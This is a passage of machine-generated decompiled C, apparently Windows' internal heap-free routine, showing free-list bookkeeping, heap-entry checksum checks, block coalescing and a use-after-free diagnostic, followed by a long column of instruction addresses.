															_t1051 = _v148 & 0x0000ffff;
														}
														_t1235 = _v40;
														_t1074 = _v44;
													}
													_t1053 = _v120 - (_t1051 & 0x0000ffff);
													_v252 = _t1053;
													__eflags = _t1053;
													_t1048 = _a4;
													if(_t1053 <= 0) {
														goto L110;
													} else {
														goto L111;
													}
												} else {
													L110:
													_t279 = _t1074 + 0x20; // 0xfffffffe
													_t1074 = _v96;
													 *( *_t279 + _v80 * 4) = _t1074;
													_t1334 = _v60;
													L111:
													__eflags = _t1235;
													if(_t1235 == 0) {
														_t1334 = _t1334 >> 5;
														_t1074 = _v60 & 0x0000001f;
														_t1235 = 1 << _t1074;
														_t287 = _v44 + 0x1c; // 0xffffbba0
														_t825 =  *_t287;
														_t288 = _t825 + _t1334 * 4;
														 *_t288 =  *(_t825 + _t1334 * 4) | 0x00000001;
														__eflags =  *_t288;
													}
													goto L113;
												}
											}
										} else {
											goto L65;
										}
										while(1) {
											L65:
											_t832 = _t1082[1];
											if(_t1341 < _t832) {
												_v168 = _t1341;
												_t833 = _t1341;
												break;
											}
											_t1246 =  *_t1082;
											__eflags = _t1246;
											if(_t1246 == 0) {
												_t833 = _t832 - 1;
												L135:
												_v168 = _t833;
												break;
											} else {
												_t1082 = _t1246;
												_v36 = _t1082;
												continue;
											}
										}
										_v40 = _t833;
										_v52 = _t833 - _t1082[5];
										_t1247 = _t1082[6];
										_v44 = _t1247;
										_t835 =  *((intOrPtr*)(_t1247 + 4));
										if(_t1247 == _t835) {
											_t1334 = _t1247;
											L92:
											__eflags = _t1334;
											if(_t1334 == 0) {
												L134:
												_t1082 =  *_t1082;
												_v36 = _t1082;
												_t833 = _t1082[5];
												goto L135;
											}
											_t809 = _t1329 + 0xc0;
											goto L94;
										}
										_t836 = _t835 + 0xfffffff8;
										_v64 = _t836;
										_t837 =  *_t836;
										_v292 = _t837;
										_t1054 = _t837 & 0x0000ffff;
										if( *(_t1329 + 0x4c) != 0) {
											_t1261 =  *(_t1329 + 0x50) ^ _t837;
											_v292 = _t1261;
											_t865 = _t1261 & 0x0000ffff;
											_v100 = _t865;
											_t1054 = _t865 & 0x0000ffff;
											_t1126 = _t1261 >> 0x00000010 ^ _t1261 >> 0x00000008 ^ _t1261;
											if(_t1261 >> 0x18 != _t1126) {
												_push(_t1126);
												L0185A80D(_t1329, _v64, 0, 0);
												_t1054 = _v100 & 0x0000ffff;
											}
											_t1247 = _v44;
										}
										_t1055 = _v84;
										_t1093 = _t1055 - (_t1054 & 0x0000ffff);
										_v240 = _t1093;
										if(_t1093 > 0) {
											_t1334 = _t1247;
											goto L90;
										} else {
											_t840 =  *_t1247 + 0xfffffff8;
											_v64 = _t840;
											_t841 =  *_t840;
											_v300 = _t841;
											_t1094 = _t841 & 0x0000ffff;
											if( *(_t1329 + 0x4c) != 0) {
												_t1257 =  *(_t1329 + 0x50) ^ _t841;
												_v300 = _t1257;
												_t859 = _t1257 & 0x0000ffff;
												_v100 = _t859;
												_v128 = _t859 & 0x0000ffff;
												_t1121 = _t1257 >> 0x00000010 ^ _t1257 >> 0x00000008 ^ _t1257;
												if(_t1257 >> 0x18 != _t1121) {
													_push(_t1121);
													L0185A80D(_t1329, _v64, 0, 0);
													_t1094 = _v100 & 0x0000ffff;
												} else {
													_t1094 = _v128;
												}
												_t1247 = _v44;
											}
											_t1096 = _t1055 - (_t1094 & 0x0000ffff);
											_v244 = _t1096;
											_t1082 = _v36;
											if(_t1096 <= 0) {
												_t1334 =  *_t1247;
												L91:
												_t1048 = _a4;
												goto L92;
											}
											if( *_t1082 != 0 || _v40 != _t1082[1] - 1) {
												_t844 = _v52 >> 5;
												_t1352 = (_t1082[1] - _t1082[5] >> 5) - 1;
												_t1249 = _t1082[7] + _t844 * 4;
												_t1060 =  !((1 << (_v52 & 0x0000001f)) - 1) &  *_t1249;
												while(1) {
													_v200 = _t1249;
													_v164 = _t844;
													if(_t1060 != 0) {
														break;
													}
													if(_t844 > _t1352) {
														__eflags = _t1060;
														if(_t1060 != 0) {
															break;
														}
														_t1048 = _a4;
														_t1082 = _v36;
														goto L134;
													} else {
														_t1249 =  &(_t1249[1]);
														_t1060 =  *_t1249;
														_t844 = _t844 + 1;
														continue;
													}
												}
												__eflags = _t1060;
												if(_t1060 != 0) {
													_t1099 = _t1060 & 0x000000ff;
													__eflags = _t1060;
													if(_t1060 == 0) {
														_t1102 = ( *((_t1060 >> 0x00000008 & 0x000000ff) + 0x17784d0) & 0x000000ff) + 8;
													} else {
														_t1102 =  *(_t1099 + 0x17784d0) & 0x000000ff;
													}
												} else {
													_t1107 = _t1060 >> 0x00000010 & 0x000000ff;
													__eflags = _t1107;
													if(_t1107 != 0) {
														_t1102 = ( *(_t1107 + 0x17784d0) & 0x000000ff) + 0x10;
													} else {
														_t1102 = ( *((_t1060 >> 0x18) + 0x17784d0) & 0x000000ff) + 0x18;
														__eflags = _t1102;
													}
												}
												_t846 = (_t844 << 5) + _t1102;
												_v164 = _t846;
												_t1103 = _v36;
												__eflags =  *(_t1103 + 8);
												if( *(_t1103 + 8) != 0) {
													_t846 = _t846 + _t846;
												}
												_t1334 =  *( *((intOrPtr*)(_t1103 + 0x20)) + _t846 * 4);
												goto L90;
											} else {
												_t1250 = _v52;
												__eflags = _t1082[2];
												if(_t1082[2] != 0) {
													_t1250 = _t1250 + _t1250;
												}
												_t1251 =  *(_t1082[8] + _t1250 * 4);
												while(1) {
													_v40 = _t1251;
													__eflags = _v44 - _t1251;
													if(_v44 == _t1251) {
														break;
													}
													_t850 = _t1251 - 8;
													_v64 = _t850;
													_t851 =  *_t850;
													_v308 = _t851;
													_t1110 = _t851 & 0x0000ffff;
													__eflags =  *(_t1329 + 0x4c);
													if( *(_t1329 + 0x4c) != 0) {
														_t1253 =  *(_t1329 + 0x50) ^ _t851;
														_v308 = _t1253;
														_t853 = _t1253 & 0x0000ffff;
														_v100 = _t853;
														_v128 = _t853 & 0x0000ffff;
														_t1116 = _t1253 >> 0x00000010 ^ _t1253 >> 0x00000008 ^ _t1253;
														__eflags = _t1253 >> 0x18 - _t1116;
														if(_t1253 >> 0x18 != _t1116) {
															_push(_t1116);
															L0185A80D(_t1329, _v64, 0, 0);
															_t1110 = _v100 & 0x0000ffff;
														} else {
															_t1110 = _v128;
														}
														_t1251 = _v40;
													}
													_t1112 = _t1055 - (_t1110 & 0x0000ffff);
													_v248 = _t1112;
													__eflags = _t1112;
													if(_t1112 > 0) {
														_t1251 =  *_t1251;
														continue;
													} else {
														_t1334 = _t1251;
														break;
													}
												}
												L90:
												_t1082 = _v36;
												goto L91;
											}
										}
									} else {
										_v72 = 0;
										_v208 = _t1048;
										_t1354 = _t1048 - (( *(_t1329 + 0x54) & 0x0000ffff ^  *(_t1048 + 4) & 0x0000ffff) << 3);
										_v52 = _t1354;
										if(_t1354 == _t1048) {
											L29:
											_t1334 = _t1048 + _t1234 * 8;
											_v52 = _t1334;
											if( *(_t1329 + 0x4c) == 0) {
												L32:
												_v86 = 1;
												while(1) {
													L33:
													_t1133 =  *(_t1329 + 0x4c);
													if(((_t1133 >> 0x00000014 &  *(_t1329 + 0x52) ^  *(_t1334 + 2)) & 0x00000001) != 0) {
														break;
													}
													if(_t1133 != 0) {
														_t1273 =  *(_t1329 + 0x50) ^  *_t1334;
														 *_t1334 = _t1273;
														_t1173 = _t1273 >> 0x00000010 ^ _t1273 >> 0x00000008 ^ _t1273;
														if(_t1273 >> 0x18 != _t1173) {
															_push(_t1173);
															L0184FA2B(_t1048, _t1329, _t1334, _t1329, _t1334, __eflags);
														}
													}
													if(_v72 != 0) {
														_t579 = _t1048 + 8; // 0x9
														_t879 = _t579;
														_t1266 =  *_t879;
														_v64 = _t1266;
														_t1134 =  *((intOrPtr*)(_t1048 + 0xc));
														_v120 = _t1134;
														_t1135 =  *_t1134;
														_t1267 =  *((intOrPtr*)(_t1266 + 4));
														__eflags = _t1135 - _t1267;
														if(_t1135 != _t1267) {
															L305:
															_push(_t1135);
															L0185A80D(_t1329, _t879, _t1267, _t1135);
															L306:
															_v72 = 0;
															goto L37;
														}
														__eflags = _t1135 - _t879;
														if(_t1135 != _t879) {
															goto L305;
														}
														 *(_t1329 + 0x74) =  *(_t1329 + 0x74) - ( *_t1048 & 0x0000ffff);
														_t1290 =  *(_t1329 + 0xb4);
														__eflags = _t1290;
														if(_t1290 == 0) {
															L291:
															_t932 = _v64;
															_t1160 = _v120;
															 *_t1160 = _t932;
															 *((intOrPtr*)(_t932 + 4)) = _t1160;
															__eflags =  *(_t1048 + 2) & 0x00000008;
															if(( *(_t1048 + 2) & 0x00000008) == 0) {
																L295:
																_t1161 =  *(_t1048 + 2);
																__eflags = _t1161 & 0x00000004;
																if((_t1161 & 0x00000004) != 0) {
																	_t934 = ( *_t1048 & 0x0000ffff) * 8 - 0x10;
																	_v156 = _t934;
																	__eflags = _t1161 & 0x00000002;
																	if((_t1161 & 0x00000002) != 0) {
																		__eflags = _t934 - 4;
																		if(_t934 > 4) {
																			_t934 = _t934 - 4;
																			__eflags = _t934;
																			_v156 = _t934;
																		}
																	}
																	_t606 = _t1048 + 0x10; // 0x11
																	_t936 = E017ED540(_t606, _t934, 0xfeeefeee);
																	_v64 = _t936;
																	__eflags = _t936 - _v156;
																	if(_t936 != _v156) {
																		_t1162 =  *[fs:0x30];
																		__eflags =  *(_t1162 + 0xc);
																		if( *(_t1162 + 0xc) == 0) {
																			_push("HEAP: ");
																			E0179B150();
																			_t1376 = _t1373 + 4;
																		} else {
																			E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																			_t1376 = _t1373 + 8;
																		}
																		_push( &(_v64[4]) + _t1048);
																		E0179B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1048);
																		_t1373 = _t1376 + 0xc;
																		_t942 =  *[fs:0x30];
																		__eflags =  *((char*)(_t942 + 2));
																		if( *((char*)(_t942 + 2)) != 0) {
																			 *0x1886378 = 1;
																			 *0x18860c0 = _t1048;
																			asm("int3");
																			 *0x1886378 = 0;
																		}
																	}
																}
																goto L306;
															}
															_t946 = E017BA229(_t1329, _t1048);
															__eflags = _t946;
															if(_t946 != 0) {
																goto L295;
															}
															E017BA309(_t1329, _t1048,  *_t1048 & 0x0000ffff, 1);
															goto L306;
														}
														_t1167 =  *_t1048 & 0x0000ffff;
														while(1) {
															__eflags = _t1167 -  *((intOrPtr*)(_t1290 + 4));
															if(_t1167 <  *((intOrPtr*)(_t1290 + 4))) {
																break;
															}
															_t952 =  *_t1290;
															__eflags = _t952;
															if(_t952 != 0) {
																_t1290 = _t952;
																continue;
															}
															_t1167 =  *((intOrPtr*)(_t1290 + 4)) - 1;
															__eflags = _t1167;
															break;
														}
														_v128 = _t1167;
														_t590 = _t1048 + 8; // 0x9
														E017BBC04(_t1329, _t1290, 1, _t590, _t1167,  *_t1048 & 0x0000ffff);
														goto L291;
													}
													L37:
													_t92 = _t1334 + 8; // 0x9
													_t1137 = _t92;
													_t1269 =  *_t1137;
													_v92 = _t1269;
													_t881 =  *((intOrPtr*)(_t1334 + 0xc));
													_v112 = _t881;
													_t882 =  *_t881;
													_t1270 =  *((intOrPtr*)(_t1269 + 4));
													if(_t882 !=  *((intOrPtr*)(_t1269 + 4)) || _t882 != _t1137) {
														_push(_t1137);
														L0185A80D(_t1329, _t1137, _t1270, _t882);
														goto L320;
													} else {
														 *(_t1329 + 0x74) =  *(_t1329 + 0x74) - ( *_t1334 & 0x0000ffff);
														_t1139 =  *(_t1329 + 0xb4);
														_v44 = _t1139;
														if(_t1139 == 0) {
															L56:
															_t885 = _v92;
															_t1140 = _v112;
															 *_t1140 = _t885;
															 *((intOrPtr*)(_t885 + 4)) = _t1140;
															if(( *(_t1334 + 2) & 0x00000008) != 0) {
																_t886 = E017BA229(_t1329, _t1334);
																__eflags = _t886;
																if(_t886 != 0) {
																	goto L57;
																}
																E017BA309(_t1329, _t1334,  *_t1334 & 0x0000ffff, 1);
																L320:
																_t1234 = _v56;
																continue;
															}
															L57:
															_t1142 =  *(_t1334 + 2);
															if((_t1142 & 0x00000004) != 0) {
																_t888 = ( *_t1334 & 0x0000ffff) * 8 - 0x10;
																_v160 = _t888;
																__eflags = _t1142 & 0x00000002;
																if((_t1142 & 0x00000002) != 0) {
																	__eflags = _t888 - 4;
																	if(_t888 > 4) {
																		_t888 = _t888 - 4;
																		__eflags = _t888;
																		_v160 = _t888;
																	}
																}
																_t625 = _t1334 + 0x10; // 0x11
																_t890 = E017ED540(_t625, _t888, 0xfeeefeee);
																_v64 = _t890;
																__eflags = _t890 - _v160;
																if(_t890 != _v160) {
																	_t1146 =  *[fs:0x30];
																	__eflags =  *(_t1146 + 0xc);
																	if( *(_t1146 + 0xc) == 0) {
																		_push("HEAP: ");
																		E0179B150();
																	} else {
																		E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																	}
																	_push( &(_v64[4]) + _t1334);
																	E0179B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1334);
																	_t899 =  *[fs:0x30];
																	__eflags =  *((char*)(_t899 + 2));
																	if( *((char*)(_t899 + 2)) != 0) {
																		 *0x1886378 = 1;
																		 *0x18860c0 = _t1334;
																		asm("int3");
																		 *0x1886378 = 0;
																	}
																}
															}
															 *(_t1048 + 2) = 0;
															 *((char*)(_t1048 + 7)) = 0;
															_t1144 = _v56 + ( *_t1334 & 0x0000ffff);
															_v56 = _t1144;
															 *_t1048 = _t1144;
															 *(_t1048 + 4 + _v56 * 8) =  *(_t1329 + 0x54) ^ _v56;
															_t1234 = _v56;
															break;
														} else {
															_t905 =  *_t1334 & 0x0000ffff;
															_v80 = _t905;
															while(_t905 >= _t1139[1]) {
																_t1278 =  *_t1139;
																__eflags = _t1278;
																if(_t1278 == 0) {
																	_t905 = _t1139[1] - 1;
																	break;
																}
																_t1139 = _t1278;
																_v44 = _t1139;
															}
															_v100 = _t905;
															_v104 = _t905;
															_t1280 = _t905 - _t1139[5];
															_v36 = _t1280;
															if(_t1139[2] != 0) {
																_t907 = _t1280 + _t1280;
															} else {
																_t907 = _t1280;
															}
															_v40 = _t907 << 2;
															_t910 = _t1139[8] + _v40;
															_v84 = _t910;
															_v64 =  *_t910;
															_t1139[3] = _t1139[3] - 1;
															_t912 = _t1139[1];
															_v60 = _t912;
															_t913 = _t912 - 1;
															_v120 = _t913;
															_t1334 = _v52;
															if(_v104 == _t913) {
																_t1139[4] = _t1139[4] - 1;
															}
															_t914 = _t1334 + 8;
															if(_v64 != _t914) {
																goto L56;
															} else {
																_v196 = _v60;
																if( *_t1139 == 0) {
																	_t1361 = _v120;
																	_v60 = _t1361;
																	_v196 = _t1361;
																}
																_t915 =  *_t914;
																_v96 = _t915;
																_v64 = _t1139[6];
																_t1334 = _v52;
																if(_v104 >= _v60) {
																	_t1150 = _v84;
																	__eflags = _t915 - _v64;
																	if(_t915 != _v64) {
																		 *_t1150 = _t915;
																		goto L56;
																	}
																	 *_t1150 = 0;
																	L55:
																	_v36 = _t1280 & 0x0000001f;
																	_t156 = _v44 + 0x1c; // 0xffffbba0
																	 *( *_t156 + (_t1280 >> 5) * 4) =  *( *_t156 + (_t1280 >> 5) * 4) &  !(1 << _v36);
																	_t1334 = _v52;
																	goto L56;
																}
																if(_t915 == _t1139[6]) {
																	L54:
																	 *(_v40 + _t1139[8]) = 0;
																	goto L55;
																}
																_t919 = _t915 + 0xfffffff8;
																_v64 = _t919;
																_t920 =  *_t919;
																_v284 = _t920;
																_v60 = _t920 & 0x0000ffff;
																_t1334 = _v52;
																if( *(_t1329 + 0x4c) != 0) {
																	_t1287 =  *(_t1329 + 0x50) ^ _t920;
																	_v284 = _t1287;
																	_t925 = _t1287 & 0x0000ffff;
																	_v120 = _t925;
																	_v60 = _t925 & 0x0000ffff;
																	_t1157 = _t1287 >> 0x00000010 ^ _t1287 >> 0x00000008 ^ _t1287;
																	if(_t1287 >> 0x18 != _t1157) {
																		_push(_t1157);
																		L0185A80D(_t1329, _v64, 0, 0);
																		_v60 = _v120 & 0x0000ffff;
																	}
																	_t1280 = _v36;
																	_t1139 = _v44;
																}
																_t146 =  &_v80;
																 *_t146 = _v80 - (_v60 & 0x0000ffff);
																_v236 = _v80;
																if( *_t146 == 0) {
																	 *(_v40 + _t1139[8]) = _v96;
																	goto L56;
																} else {
																	goto L54;
																}
															}
														}
													}
												}
												_a4 = _t1048;
												_t1073 = _v29;
												goto L60;
											}
											_t956 =  *_t1334;
											_v276 = _t956;
											_t1294 =  *(_t1329 + 0x50) ^ _t956;
											_v276 = _t1294;
											_t1178 = _t1294 >> 0x00000010 ^ _t1294 >> 0x00000008 ^ _t1294;
											if(_t1294 >> 0x18 != _t1178) {
												_v86 = 0;
												_push(_t1178);
												L0185A80D(_t1329, _t1334, 0, 0);
												_t1234 = _v56;
												goto L33;
											} else {
												_t1234 = _v56;
												goto L32;
											}
										}
										_t1180 =  *(_t1329 + 0x4c);
										if(((_t1180 >> 0x00000014 &  *(_t1329 + 0x52) ^  *(_t1354 + 2)) & 0x00000001) == 0) {
											__eflags = _t1180;
											if(_t1180 != 0) {
												_t1316 =  *(_t1329 + 0x50) ^  *_t1354;
												 *_t1354 = _t1316;
												_t1206 = _t1316 >> 0x00000010 ^ _t1316 >> 0x00000008 ^ _t1316;
												__eflags = _t1316 >> 0x18 - _t1206;
												if(__eflags != 0) {
													_push(_t1206);
													L0184FA2B(_t1048, _t1329, _t1354, _t1329, _t1354, __eflags);
												}
											}
											_t320 = _t1354 + 8; // 0x9
											_t1297 = _t320;
											_t1181 =  *_t1297;
											_v120 = _t1181;
											_t964 =  *((intOrPtr*)(_t1354 + 0xc));
											_v64 = _t964;
											_t965 =  *_t964;
											_t1182 =  *((intOrPtr*)(_t1181 + 4));
											__eflags = _t965 - _t1182;
											if(_t965 != _t1182) {
												L280:
												_push(_t1182);
												L0185A80D(_t1329, _t1297, _t1182, _t965);
												goto L163;
											} else {
												__eflags = _t965 - _t1297;
												if(_t965 != _t1297) {
													goto L280;
												}
												 *(_t1329 + 0x74) =  *(_t1329 + 0x74) - ( *_t1354 & 0x0000ffff);
												_t1184 =  *(_t1329 + 0xb4);
												_v36 = _t1184;
												__eflags = _t1184;
												if(_t1184 == 0) {
													L160:
													_t968 = _v120;
													_t1185 = _v64;
													 *_t1185 = _t968;
													 *(_t968 + 4) = _t1185;
													__eflags =  *(_t1354 + 2) & 0x00000008;
													if(( *(_t1354 + 2) & 0x00000008) != 0) {
														_t969 = E017BA229(_t1329, _t1354);
														__eflags = _t969;
														if(_t969 != 0) {
															goto L161;
														}
														E017BA309(_t1329, _t1354,  *_t1354 & 0x0000ffff, 1);
														L163:
														_t1234 = _v56;
														goto L29;
													}
													L161:
													_t1187 =  *(_t1354 + 2);
													__eflags = _t1187 & 0x00000004;
													if((_t1187 & 0x00000004) != 0) {
														_t1063 = ( *_t1354 & 0x0000ffff) * 8 - 0x10;
														_v204 = _t1063;
														__eflags = _t1187 & 0x00000002;
														if((_t1187 & 0x00000002) != 0) {
															__eflags = _t1063 - 4;
															if(_t1063 > 4) {
																_t1063 = _t1063 - 4;
																__eflags = _t1063;
																_v204 = _t1063;
															}
														}
														_t570 = _t1354 + 0x10; // 0x11
														_t972 = E017ED540(_t570, _t1063, 0xfeeefeee);
														_v64 = _t972;
														__eflags = _t972 - _t1063;
														if(_t972 != _t1063) {
															_t1191 =  *[fs:0x30];
															__eflags =  *(_t1191 + 0xc);
															if( *(_t1191 + 0xc) == 0) {
																_push("HEAP: ");
																E0179B150();
																_t1377 = _t1373 + 4;
															} else {
																E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																_t1377 = _t1373 + 8;
															}
															_push( &(_v64[4]) + _t1354);
															E0179B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1354);
															_t1373 = _t1377 + 0xc;
															_t981 =  *[fs:0x30];
															__eflags =  *((char*)(_t981 + 2));
															if( *((char*)(_t981 + 2)) != 0) {
																 *0x1886378 = 1;
																 *0x18860c0 = _t1354;
																asm("int3");
																 *0x1886378 = 0;
															}
														}
													}
													 *(_t1354 + 2) = 0;
													 *((char*)(_t1354 + 7)) = 0;
													_t1048 = _t1354;
													_v208 = _t1048;
													_t1189 = _v56 + ( *_t1354 & 0x0000ffff);
													_v56 = _t1189;
													 *_t1354 = _t1189;
													_t1190 = _v56;
													_t975 =  *(_t1329 + 0x54) ^ _t1190;
													__eflags = _t975;
													 *(_t1354 + 4 + _t1190 * 8) = _t975;
													goto L163;
												}
												_v44 =  *_t1354 & 0x0000ffff;
												while(1) {
													_t988 =  *((intOrPtr*)(_t1184 + 4));
													__eflags = _v44 - _t988;
													if(_v44 < _t988) {
														break;
													}
													_t1301 =  *_t1184;
													_v96 = _t1301;
													__eflags = _t1301;
													_t429 = _t1354 + 8; // 0x9
													_t1297 = _t429;
													if(_t1301 == 0) {
														_t989 = _t988 - 1;
														L146:
														_v192 = _t989;
														_v40 = _t989;
														_t990 = _t989 -  *((intOrPtr*)(_t1184 + 0x14));
														_v84 = _t990;
														__eflags =  *(_t1184 + 8);
														if( *(_t1184 + 8) != 0) {
															_t990 = _t990 + _t990;
														}
														_t1362 = _t990 * 4;
														_v60 = _t1362;
														_t992 =  *((intOrPtr*)(_t1184 + 0x20)) + _t1362;
														_v104 = _t992;
														_v112 =  *_t992;
														 *((intOrPtr*)(_t1184 + 0xc)) =  *((intOrPtr*)(_t1184 + 0xc)) - 1;
														_t994 =  *((intOrPtr*)(_t1184 + 4));
														_v80 = _t994;
														_t1363 = _t994 - 1;
														_v92 = _t1363;
														_t995 = _v40;
														__eflags = _t995 - _t1363;
														_t1354 = _v52;
														if(_t995 == _t1363) {
															 *((intOrPtr*)(_t1184 + 0x10)) =  *((intOrPtr*)(_t1184 + 0x10)) - 1;
														}
														__eflags = _v112 - _t1297;
														if(_v112 != _t1297) {
															goto L160;
														} else {
															_v188 =  *((intOrPtr*)(_t1184 + 4));
															__eflags =  *_t1184;
															if( *_t1184 == 0) {
																_t1368 = _v92;
																_v80 = _t1368;
																_v188 = _t1368;
															}
															_t1302 =  *_t1297;
															_v96 = _t1302;
															_v92 =  *((intOrPtr*)(_t1184 + 0x18));
															__eflags = _t995 - _v80;
															_t1354 = _v52;
															if(_t995 >= _v80) {
																_t996 = _v104;
																__eflags = _t1302 - _v92;
																if(_t1302 == _v92) {
																	 *_t996 = 0;
																	goto L159;
																}
																 *_t996 = _t1302;
																goto L160;
															} else {
																__eflags = _t1302 -  *((intOrPtr*)(_t1184 + 0x18));
																if(_t1302 ==  *((intOrPtr*)(_t1184 + 0x18))) {
																	L158:
																	 *(_v60 +  *((intOrPtr*)(_t1184 + 0x20))) = 0;
																	L159:
																	_t1195 = _v84;
																	_t1367 = _t1195 >> 5;
																	_t998 =  *((intOrPtr*)(_v36 + 0x1c));
																	_t381 = _t998 + _t1367 * 4;
																	 *_t381 =  *(_t998 + _t1367 * 4) &  !(1 << (_t1195 & 0x0000001f));
																	__eflags =  *_t381;
																	_t1354 = _v52;
																	goto L160;
																}
																_t1000 = _t1302 - 8;
																_v92 = _t1000;
																_t1001 =  *_t1000;
																_v268 = _t1001;
																_t1307 = _t1001 & 0x0000ffff;
																__eflags =  *(_t1329 + 0x4c);
																if( *(_t1329 + 0x4c) != 0) {
																	_t1312 =  *(_t1329 + 0x50) ^ _t1001;
																	_v268 = _t1312;
																	_t1004 = _t1312 & 0x0000ffff;
																	_v112 = _t1004;
																	_v40 = _t1004 & 0x0000ffff;
																	_t1201 = _t1312 >> 0x00000010 ^ _t1312 >> 0x00000008 ^ _t1312;
																	__eflags = _t1312 >> 0x18 - _t1201;
																	if(_t1312 >> 0x18 != _t1201) {
																		_push(_t1201);
																		L0185A80D(_t1329, _v92, 0, 0);
																		_t1307 = _v112 & 0x0000ffff;
																	} else {
																		_t1307 = _v40;
																	}
																	_t1184 = _v36;
																}
																_t1309 = _v44 - (_t1307 & 0x0000ffff);
																__eflags = _t1309;
																_v232 = _t1309;
																if(_t1309 == 0) {
																	 *(_v60 +  *((intOrPtr*)(_t1184 + 0x20))) = _v96;
																	goto L160;
																} else {
																	goto L158;
																}
															}
														}
													}
													_t1184 = _v96;
													_v36 = _t1184;
												}
												_t989 = _v44;
												goto L146;
											}
										}
										goto L29;
									}
								}
							}
							_t1217 =  *(_t1329 + 0xc8);
							_t1322 =  *[fs:0x18];
							asm("lock btr dword [eax], 0x0");
							if(_t1382 >= 0) {
								__eflags =  *((intOrPtr*)(_t1217 + 0xc)) -  *((intOrPtr*)(_t1322 + 0x24));
								if(__eflags == 0) {
									 *(_t1217 + 8) =  *(_t1217 + 8) + 1;
									goto L10;
								}
								_v184 = 0;
								__eflags =  *0x1887bc8;
								if( *0x1887bc8 != 0) {
									_v85 = 0;
									 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc0000194;
									_t1370 =  *[fs:0x18];
									_v220 = _t1370;
									 *((intOrPtr*)(_t1370 + 0x34)) = E0179CCC0(0xc0000194);
									_v180 = 0;
									_t1339 = 0;
									_a4 = 0;
									goto L117;
								}
								E017AEEF0( *(_t1329 + 0xc8));
								_t1217 = _t1329;
								E017D4032(_t1217, 1);
								goto L11;
							} else {
								 *((intOrPtr*)(_t1217 + 0xc)) =  *((intOrPtr*)(_t1322 + 0x24));
								 *(_t1217 + 8) = 1;
								L10:
								_v184 = 1;
								 *((intOrPtr*)(_t1329 + 0x204)) =  *((intOrPtr*)(_t1329 + 0x204)) + 1;
								L11:
								_v85 = 1;
								_v45 = 1;
								_t1048 = _a4;
								if( *(_t1329 + 0x4c) != 0) {
									 *_t1048 =  *_t1048 ^  *(_t1329 + 0x50);
									if( *(_t1048 + 3) != ( *(_t1048 + 2) ^  *(_t1048 + 1) ^  *_t1048)) {
										_push(_t1217);
										L0184FA2B(_t1048, _t1329, _t1048, _t1329, _t1333, __eflags);
									}
								}
								_t1218 =  *_t1048 & 0x0000ffff;
								_t1028 =  *(_t1329 + 0xb4);
								while(1) {
									_t1323 =  *((intOrPtr*)(_t1028 + 4));
									if(_t1218 < _t1323) {
										_t1324 = _t1323 - 1;
										break;
									}
									_t1369 =  *_t1028;
									__eflags = _t1369;
									if(__eflags == 0) {
										_t1218 = _t1323 - 1;
										_t1324 = _t1218;
										break;
									}
									_t1028 = _t1369;
								}
								if(_t1218 >= _t1324) {
									__eflags =  *_t1028;
									if(__eflags != 0) {
										__eflags = _t1218 - _t1324;
										if(__eflags == 0) {
											goto L17;
										}
									}
									_v152 = 0;
									goto L19;
								}
								L17:
								_t1219 = _t1218 -  *((intOrPtr*)(_t1028 + 0x14));
								if( *((intOrPtr*)(_t1028 + 8)) != 0) {
									_t1219 = _t1219 + _t1219;
								}
								_v152 =  *((intOrPtr*)(_t1028 + 0x20)) + _t1219 * 4;
								goto L19;
							}
						}
						L6:
						_t1048 = _a4;
						goto L7;
					}
					L4:
					_t721 = 0x7ffe0380;
					goto L5;
				}
			}


































































































































































































































































































                                                          0x017b7d70
                                                          0x017b7d75
                                                          0x017b7d77
                                                          0x017b7d7c
                                                          0x017b7d87
                                                          0x017b7d88
                                                          0x017b7d8e
                                                          0x017b7d91
                                                          0x017b7d96
                                                          0x017b7d9b
                                                          0x017b7d9f
                                                          0x017b7da5
                                                          0x017b7da7
                                                          0x017b7dad
                                                          0x017b7db1
                                                          0x017b7db5
                                                          0x017b7dbf
                                                          0x017b7dc9
                                                          0x017b7dd0
                                                          0x017b7dd7
                                                          0x017b7de3
                                                          0x017b7de7
                                                          0x017b7dec
                                                          0x017ffd54
                                                          0x017ffd61
                                                          0x017ffd66
                                                          0x017b84f9
                                                          0x017b84fc
                                                          0x017b850a
                                                          0x017b850a
                                                          0x017b7df2
                                                          0x017b7df5
                                                          0x017b7dfe
                                                          0x017b8a36
                                                          0x017b8a3a
                                                          0x017b8a3f
                                                          0x017b8a45
                                                          0x00000000
                                                          0x00000000
                                                          0x017ffd6d
                                                          0x017ffd73
                                                          0x00000000
                                                          0x017ffd79
                                                          0x017ffd79
                                                          0x017ffd7c
                                                          0x00000000
                                                          0x017ffd7c
                                                          0x017b7e04
                                                          0x017b7e04
                                                          0x017b7e09
                                                          0x017b7e0f
                                                          0x017b7e14
                                                          0x017ffd86
                                                          0x017ffd89
                                                          0x00000000
                                                          0x00000000
                                                          0x017ffd98
                                                          0x017b7e1f
                                                          0x017b7e22
                                                          0x017ffda8
                                                          0x017ffdaf
                                                          0x00000000
                                                          0x00000000
                                                          0x017ffdc1
                                                          0x017ffdc8
                                                          0x017ffdca
                                                          0x017ffdcd
                                                          0x017ffdd7
                                                          0x017ffdd9
                                                          0x017ffdde
                                                          0x017ffdde
                                                          0x017b7e2b
                                                          0x017b7e2b
                                                          0x017b7e32
                                                          0x017b7e35
                                                          0x017b88e0
                                                          0x017b88e4
                                                          0x017b88ed
                                                          0x017b88f7
                                                          0x017b88fa
                                                          0x017ffe3e
                                                          0x017ffe43
                                                          0x017ffe43
                                                          0x017b88fa
                                                          0x017b7ed0
                                                          0x017b7ed0
                                                          0x017b7ed0
                                                          0x017b7ed3
                                                          0x017b7ed7
                                                          0x017b88d9
                                                          0x017b88d9
                                                          0x017b7ee1
                                                          0x017b8b4f
                                                          0x017b8b52
                                                          0x017b8b55
                                                          0x017b8b58
                                                          0x017b8b65
                                                          0x017b8b68
                                                          0x017b8b6e
                                                          0x017b8b70
                                                          0x017b8b73
                                                          0x017b8b75
                                                          0x017b8b78
                                                          0x017b8b7a
                                                          0x01800417
                                                          0x01800417
